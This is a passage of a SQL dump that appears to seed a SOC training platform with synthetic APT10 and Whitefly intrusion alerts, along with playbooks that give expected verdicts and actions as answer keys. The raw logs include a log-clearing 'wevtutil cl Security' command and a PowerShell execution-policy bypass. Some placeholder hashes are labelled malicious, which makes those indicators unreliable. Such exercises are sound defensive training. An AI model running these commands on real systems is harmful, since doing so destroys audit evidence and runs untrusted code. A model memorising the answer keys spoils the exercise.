detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"time\\\":\\\"2023-09-15T14:23:45Z\\\",\\\"event_id\\\":7045,\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"192.168.1.20\\\",\\\"user\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Services\\\\\\\\MaliciousService\\\",\\\"service_name\\\":\\\"MaliciousService\\\",\\\"image_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Service Installed\\\",\\\"description\\\":\\\"A new service was installed on the machine to maintain persistence.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.992Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"time\\\":\\\"2023-09-15T14:23:45Z\\\",\\\"event_id\\\":7045,\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"192.168.1.20\\\",\\\"user\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Services\\\\\\\\MaliciousService\\\",\\\"service_name\\\":\\\"MaliciousService\\\",\\\"image_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Service Installed\\\",\\\"description\\\":\\\"A new service was installed on the machine to maintain persistence.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.992Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"time\\\":\\\"2023-09-15T14:23:45Z\\\",\\\"event_id\\\":7045,\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"192.168.1.20\\\",\\\"user\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Services\\\\\\\\MaliciousService\\\",\\\"service_name\\\":\\\"MaliciousService\\\",\\\"image_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Service Installed\\\",\\\"description\\\":\\\"A new service was installed on the machine to maintain persistence.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.992Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"time\\\":\\\"2023-09-15T14:23:45Z\\\",\\\"event_id\\\":7045,\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"192.168.1.20\\\",\\\"user\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Services\\\\\\\\MaliciousService\\\",\\\"service_name\\\":\\\"MaliciousService\\\",\\\"image_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Service Installed\\\",\\\"description\\\":\\\"A new service was installed on the machine to maintain persistence.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.992Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"time\\\":\\\"2023-09-15T14:23:45Z\\\",\\\"event_id\\\":7045,\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"192.168.1.20\\\",\\\"user\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Services\\\\\\\\MaliciousService\\\",\\\"service_name\\\":\\\"MaliciousService\\\",\\\"image_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Service Installed\\\",\\\"description\\\":\\\"A new service was installed on the machine to maintain persistence.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(392, 'Lateral Movement to Access Design Servers', 'high', 'Network Traffic Analysis', 'During the investigation of unusual network patterns, it was identified that a malicious entity performed lateral movement within the corporate network to access critical design servers. The attackers employed techniques consistent with the APT10 group\'s TTPs, leveraging compromised credentials to gain unauthorized access to servers containing sensitive CAD files. This alert represents step 4 of the operation where the attackers successfully reached the target servers.', 'Lateral Movement', 'T1080: Taint Shared Content', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:18Z\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"10.0.0.45\",\"attacker_ip\":\"203.0.113.45\",\"user\":\"j.doe@company.com\",\"accessed_file\":\"designServerAccess.log\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"lateral_move\",\"result\":\"success\",\"protocol\":\"SMB\",\"malware\":\"CloudHopper\",\"description\":\"Lateral movement detected towards design server using stolen credentials.\",\"os\":\"Windows Server 2019\"}', '2026-01-04 02:14:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Target design server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with APT10.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with CloudHopper malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"designServerAccess.log\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"clean\",\"details\":\"Log file accessed during lateral movement.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"j.doe@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Compromised user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(393, 'Data Collection from CAD Repositories', 'high', 'File Access Logs', 'APT10 is actively collecting large CAD files from compromised servers within the aerospace sector. This operation stage focuses on aggregating these files for planned exfiltration.', 'Collection', 'T1119 - Automated Collection', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:47Z\",\"event_id\":\"file_access_8765\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"user\":\"j.doe\",\"access_type\":\"read\",\"file_name\":\"aerospace_project_design.cad\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_size\":\"15MB\",\"protocol\":\"SMB\",\"action\":\"access_granted\"}', '2026-01-04 02:14:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT10 IP involved in previous aerospace sector attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"aerospace_project_design.cad\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Sensitive CAD file targeted by APT10.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Hash Database\",\"verdict\":\"clean\",\"details\":\"Common placeholder hash, needs further investigation for exact matches.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.995Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:47Z\\\",\\\"event_id\\\":\\\"file_access_8765\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"user\\\":\\\"j.doe\\\",\\\"access_type\\\":\\\"read\\\",\\\"file_name\\\":\\\"aerospace_project_design.cad\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"SMB\\\",\\\"action\\\":\\\"access_granted\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.995Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:47Z\\\",\\\"event_id\\\":\\\"file_access_8765\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"user\\\":\\\"j.doe\\\",\\\"access_type\\\":\\\"read\\\",\\\"file_name\\\":\\\"aerospace_project_design.cad\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"SMB\\\",\\\"action\\\":\\\"access_granted\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.995Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:47Z\\\",\\\"event_id\\\":\\\"file_access_8765\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"user\\\":\\\"j.doe\\\",\\\"access_type\\\":\\\"read\\\",\\\"file_name\\\":\\\"aerospace_project_design.cad\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"SMB\\\",\\\"action\\\":\\\"access_granted\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.995Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:47Z\\\",\\\"event_id\\\":\\\"file_access_8765\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"user\\\":\\\"j.doe\\\",\\\"access_type\\\":\\\"read\\\",\\\"file_name\\\":\\\"aerospace_project_design.cad\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"SMB\\\",\\\"action\\\":\\\"access_granted\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.995Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:47Z\\\",\\\"event_id\\\":\\\"file_access_8765\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"user\\\":\\\"j.doe\\\",\\\"access_type\\\":\\\"read\\\",\\\"file_name\\\":\\\"aerospace_project_design.cad\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"SMB\\\",\\\"action\\\":\\\"access_granted\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(394, 'Exfiltration of CAD Files via Encrypted Channels', 'high', 'Outbound Network Traffic', 'APT10 is utilizing encrypted channels to exfiltrate CAD files from the network. The operation involves transferring data to a known malicious external IP using SSL/TLS encryption, making detection challenging.', 'Exfiltration', 'T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 ', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"exfil-20231012-001\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"TLS\",\"encrypted_data_size\":\"15MB\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\",\"filename\":\"designs_v3_aggregated.zip\",\"user\":\"jdoe\",\"process_name\":\"explorer.exe\",\"indicator_of_compromise\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\"},{\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\"},{\"type\":\"filename\",\"value\":\"designs_v3_aggregated.zip\"}],\"alert_description\":\"Observed encrypted data transfer to a known malicious IP associated with APT10.\"}', '2026-01-04 02:14:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT10 infrastructure component.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"designs_v3_aggregated.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"File name pattern matches previous exfiltration attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(395, 'Clean-up and Cover Tracks', 'high', 'System Event Logs', 'The attackers attempted to erase logs and artifacts to obscure their presence and activities within the network. This is a typical step in their operation to remove traces of intrusion.', 'Defensive Evasion', 'T1070', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"event_id\":4625,\"event_type\":\"Security\",\"action\":\"Log Deletion\",\"username\":\"admin_user\",\"host_ip\":\"10.0.0.15\",\"source_ip\":\"203.0.113.45\",\"log_file\":\"C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"process\":\"wevtutil.exe\",\"command_line\":\"wevtutil cl Security\"}', '2026-01-04 02:14:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT10 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potential malicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.998Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"event_id\\\":4625,\\\"event_type\\\":\\\"Security\\\",\\\"action\\\":\\\"Log Deletion\\\",\\\"username\\\":\\\"admin_user\\\",\\\"host_ip\\\":\\\"10.0.0.15\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"log_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"process\\\":\\\"wevtutil.exe\\\",\\\"command_line\\\":\\\"wevtutil cl Security\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.998Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"event_id\\\":4625,\\\"event_type\\\":\\\"Security\\\",\\\"action\\\":\\\"Log Deletion\\\",\\\"username\\\":\\\"admin_user\\\",\\\"host_ip\\\":\\\"10.0.0.15\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"log_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"process\\\":\\\"wevtutil.exe\\\",\\\"command_line\\\":\\\"wevtutil cl Security\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.998Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"event_id\\\":4625,\\\"event_type\\\":\\\"Security\\\",\\\"action\\\":\\\"Log Deletion\\\",\\\"username\\\":\\\"admin_user\\\",\\\"host_ip\\\":\\\"10.0.0.15\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"log_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"process\\\":\\\"wevtutil.exe\\\",\\\"command_line\\\":\\\"wevtutil cl Security\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.998Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"event_id\\\":4625,\\\"event_type\\\":\\\"Security\\\",\\\"action\\\":\\\"Log Deletion\\\",\\\"username\\\":\\\"admin_user\\\",\\\"host_ip\\\":\\\"10.0.0.15\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"log_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"process\\\":\\\"wevtutil.exe\\\",\\\"command_line\\\":\\\"wevtutil cl Security\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.998Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"event_id\\\":4625,\\\"event_type\\\":\\\"Security\\\",\\\"action\\\":\\\"Log Deletion\\\",\\\"username\\\":\\\"admin_user\\\",\\\"host_ip\\\":\\\"10.0.0.15\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"log_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"process\\\":\\\"wevtutil.exe\\\",\\\"command_line\\\":\\\"wevtutil cl Security\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(396, 'Suspicious Network Activity Detected', 'high', 'Network Intrusion Detection System (NIDS)', 'Initial access attempt identified through a phishing email containing a malicious link, typically used by the Whitefly group. The email was sent to an internal user and contained a link leading to the download of a malicious payload.', 'Initial Access', 'T1566.001 - Spearphishing Link', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"protocol\":\"HTTP\",\"url\":\"http://malicious-example.com/download\",\"email_sender\":\"hacker@example.com\",\"email_recipient\":\"user@internal.com\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"file_hash\":\"2b8e5d8f7e9c4f8a9b6e5d9f7c6b8e5d\",\"filename\":\"invoice.pdf\",\"alert\":\"Phishing Link Detected\",\"ids_reference\":\"NIDS-2345\"}', '2026-01-04 02:15:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by phishing email.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-example.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware URL Database\",\"verdict\":\"malicious\",\"details\":\"URL hosting a known malicious payload.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"hacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address associated with phishing activities.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"2b8e5d8f7e9c4f8a9b6e5d9f7c6b8e5d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash identified as a malicious payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(397, 'Execution of Malicious Script', 'high', 'Endpoint Detection and Response (EDR)', 'An advanced malicious script execution was detected on the endpoint, aiming to establish a foothold by deploying the Vcrodat malware. The script was initially downloaded via a phishing link.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:08Z\",\"event_type\":\"execution\",\"host\":{\"hostname\":\"compromised-endpoint\",\"ip\":\"192.168.1.105\"},\"user\":\"jdoe\",\"process\":{\"name\":\"powershell.exe\",\"pid\":4567,\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\"},\"file\":{\"path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\",\"hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\"},\"network\":{\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":80},\"malware\":{\"name\":\"Vcrodat\",\"signature_version\":\"1.2.3\",\"hash\":\"6a2da3a46e0f4e8b8a7d4b2a2c8e7a5f\"}}', '2026-01-04 02:15:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in previous malware incidents.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"6a2da3a46e0f4e8b8a7d4b2a2c8e7a5f\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches the Vcrodat malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename typically used in phishing attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Employee account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 